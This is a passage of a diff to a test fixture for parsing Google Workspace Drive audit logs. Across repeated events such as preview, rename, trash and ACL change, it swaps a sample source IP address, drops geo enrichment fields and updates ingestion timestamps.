"city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1127,7 +911,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1160,8 +944,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822610600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398352600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "preview", "id": "1", @@ -1180,31 +964,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1224,7 +990,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1257,8 +1023,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822612300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398358400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "print", "id": "1", @@ -1277,31 +1043,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1321,7 +1069,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1356,8 +1104,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822613800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", + "ingested": "2021-12-09T13:39:08.398364Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "remove_from_folder", "id": "1", @@ -1376,31 +1124,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1421,7 +1151,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1455,8 +1185,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822615200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}", + "ingested": "2021-12-09T13:39:08.398369800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}", "provider": "drive", "action": "rename", "id": "1", @@ -1475,31 +1205,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1519,7 +1231,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1552,8 +1264,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822616700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398375400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "untrash", "id": "1", @@ -1572,31 +1284,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1616,7 +1310,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1649,8 +1343,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822618200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398381300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "sheets_import_range", "id": "1", @@ -1669,31 +1363,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1713,7 +1389,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1746,8 +1422,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822619600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398387Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "trash", "id": "1", @@ -1766,31 +1442,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1810,7 +1468,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1843,8 +1501,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822621100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398392700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "remove_lock", "id": "1", @@ -1863,31 +1521,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1907,7 +1547,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1940,8 +1580,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822622500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398398400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "upload", "id": "1", @@ -1960,31 +1600,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2004,7 +1626,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2038,8 +1660,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822624Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:39:08.398404Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "view", "id": "1", @@ -2058,31 +1680,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2102,7 +1706,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2139,8 +1743,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822625400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", + "ingested": "2021-12-09T13:39:08.398409700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 